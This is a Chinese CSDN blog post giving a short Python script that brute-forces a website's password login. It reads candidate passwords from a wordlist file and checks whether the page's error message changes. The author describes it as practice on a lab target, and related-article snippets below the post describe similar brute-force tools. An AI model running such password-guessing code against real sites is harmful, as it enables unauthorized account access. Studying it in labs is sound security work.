python编写字典爆破网站登录|思路

最新推荐文章于 2024-04-27 14:51:21 发布
最新推荐文章于 2024-04-27 14:51:21 发布
阅读量1.6k 收藏 15
点赞数 3
分类专栏: Python 文章标签: python 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45951067/article/details/121071783
版权

在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴写了一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!!
如果有好用的爆破工具,欢迎大佬推荐~

方便理解,我简单说一下背景:
渗透的是某靶机的网站,该靶机只用输入正确密码就能成功登录,在密码错误后在html中会返回如下字段:
在这里插入图片描述
所以我用爬虫把这个关键字段给爬出来了与正确密码作比较

import json
from pyquery import PyQuery
import requests
url="这里是url地址(这里为了防止恶意攻击,就不把地址放出来了)"
text="对不起,登录ID或密码(口令)错误"  #这里面的文本是爬虫爬出来的网页返回的值
real_password=0
time=0
e=open('pwd.txt',"r")
print("密码爆破开始!")
for login_password in e:
    data={'password':login_password}
    r = requests.post(url,data=data)
    doc=PyQuery(r.text)
    time+=1
    if doc("#tagContent0 p").text()!=text:   #这里拿爬出来的数据和文本作对比,相同则说明密码还是错的,不同说明密码就对了!
        real_password=login_password
        break
    print("密码错误,尝试爆破第{}次".format(time))
print("爆破结束!!")
print("爆破密码为:{}".format(real_password))
e.close()

因为没有把该靶,这个代码需要你们改改才能用
运行截图:
在这里插入图片描述

向阳-Y.
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python网站登录爆破登录_用python爆破某会员网站
weixin_42360788的博客
02-04 723
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python网站登录爆破登录_看我如何爆破加密的web登录表单
weixin_39915078的博客
12-17 675
有很多方法来爆破登录表单,你只需要 google 一下就可以在搜索的结果中看到一些通常的做法。在你使用 Burp 的情况下,这些搜索出来的爆破方式将足以满足大多数的形式爆破。但有时候,爆破不会那么简单,你需要编写自己的工具。这可能是因为一些各种原因所致,但通常它归结为通过 HTTP(S)的自定义协议或输入的数据的是一些自定义的加密算法。在这篇文章中,我们将介绍两种编写这些工具的方法:1. 编写你自...
只用20行Python代码就攻破了网站登录
公众号:Python研究者
03-12 1840
大家好,我是辰哥~今天教大家用Python代码攻破网站登录(在测试靶机上进行实验),原理上是抓包和改包,如果学过的爬虫的话,相信你会快看懂这篇文章测试靶机为DVWA,适合DVWA暴力破解模...
爆破各种服务网站字典最全
04-21
自己收集的字典,挺全的。可以用于爆破各种服务的账号字典爆破网站目录字典、数据库字典、撞库、后门等用途字典
Python暴力破解网站登录密码脚本_python 登录网站密码
m0_60666841的博客
04-27 357
【代码】Python暴力破解网站登录密码脚本_python 登录网站密码。
python登录网页账号密码,python网站登录爆破登录
zjl102562的博客
04-07 267
在本篇文章中,我们将介绍如何使用Python编写代码来实现网站自动登录的功能。我们将使用Python的第三方库来处理网络请求和HTML解析,以便实现自动登录的过程。首先,我们需要安装所需的Python库,这些库将帮助我们处理网络请求和HTML解析。安装完成后,我们可以开始编写自动登录的代码。以下是一个示例代码,展示了如何使用Python来自动登录一个网站Python实现网站自动登录
密码破解!字典攻击(C/C++代码实现)
chen1415886044的博客
08-13 3003
字典攻击是一种通过系统地将字典中的每个单词作为密码输入,从而侵入受密码保护的计算机、网络或其他IT资源的方法。字典攻击也可以用于查找解密加密消息或文档所需的密钥。 字典攻击之所以有效,是因为许多计算机用户和企业坚持使用普通单词作为密码。这些攻击通常针对使用多字密码的系统不成功,也经常针对由大小写字母和随机组合的数字组成的密码不成功。 在密码要求很高的系统中,暴力攻击方法有时是有效的,在这种方法中,字符和空格的每一个可能组合都要测试到一定的最大长度。然而,暴力攻击可能需要很长时间才能产生结果。
Python编写固定字典爆破
05-19
本主题聚焦于使用Python编程语言实现针对特定服务(如电子邮件、Redis、FTP、SSH和MySQL)的固定字典爆破。这些服务通常都需要用户名和密码进行身份验证,而固定字典爆破是一种尝试匹配预定义密码列表的方法。 首先...
Python 编写 可自定义字典. 爆破
最新发布
05-19
包含:电子邮件 || Redis || FTP || SSH || MySQL 爆破.
python字典生成
07-28
在描述中提到的"dictionary.exe"可能是一个用于字典生成或爆破的可执行程序,而在Python环境下,我们通常会编写脚本来实现这类功能。例如,我们可以创建一个脚本,根据用户指定的字符集和长度生成密码字典: ```...
python编写暴力破解FTP密码小工具
01-20
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要...
网站目录爆破工具
08-09
python编写网站目录爆破 python dirscan.py 输入url 线程数 字典文件即可
python 穷举法生成爆破密码词典
MuratHalik的博客
11-05 2023
本次折腾用于忘记比特币核心钱包支付密码的暴力破解(如果成功我就躺平!python 穷举法生成爆破密码词典。
python真的可以为所欲为——爆破前端加密登录
公众号:Python研究者
09-08 366
关注公众号:Python爬虫数据分析挖掘,回复【开源源码】免费获取更多开源项目源码 做安全测试的时候经常会遇到前端登录数据包加密,又懒得去分析js看加密算法,特别一些做了混淆的,分析起来那叫一个恶心…… 逼的我又拿起了python,开始一顿操作 python真的能为所欲为 基础知识 这次要用到的是一个叫pyautogui的库,在python2的环境下安装很简单 python -m pip install pyautogui 然后在命令行测试一下是否能引用 image..
Python 爆破web登录实验笔记
m0_60823533的博客
05-15 1168
总体原理:多次发送密码尝试穷举爆破 具体流程分析: 1.抓取web发送账号密码数据接口 2.自动识别验证码 3.获取到密码和验证码结果,通过python模拟无限次发送 4.分析返回结果 详细流程: (1).抓取web发送账号密码数据接口 网站登录界面示例: 通过抓取提交数据接口发现有用户名,密码,验证码三个数据,这里需要分析第三个数据怎么获取,直接打开云代码查看,看到了获取验证码的接口! 但是经过测试始终提示验证码错误,又回来分析验证码接口,终于反复查看发现这
python3登录爆破脚本
deng_menglihua的博客
09-17 2790
登录爆破脚本 以下地址是我自己的DVWA靶场的地址,欢迎大家交流学习。 1.post型登录爆破脚本 import requests s='0123456789' url="http://10.16.102.162/DVWA/vulnerabilities/brute/?" m=0 n=1 username=input("请输入用户名") data2={'username':username,'password':00000,'Login':'Login'} headers={'cookie':'secur
学习Python渗透第十二天:用Python实现暴力破解
2203_75839317的博客
03-25 1237
接下来,我们来编写一个可以实现登录功能的Python程序,这里需要用到requests库,这是一个专门用来处理HTTP的库,利用这个库发起请求十分简单,例如我们需要发送POST请求,需要用到requests.post()函数,这个函数比较复杂,常用格式如下。
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2239
简单对靶向网站进行暴力破解的简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破解......
python暴破服务器用户密码
qq_69613156的博客
11-08 827
python写个脚本,暴破web服务器里面的用户名及密码信息。包括已知用户名情况,和未知用户名情况。
python如何字典爆破
06-11
Python中,可以通过编写脚本来实现字典爆破。 以下是一个简单的Python字典爆破的代码示例: ```python import hashlib def crack_password(password_hash): with open('passwords.txt', 'r') as f: for line ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值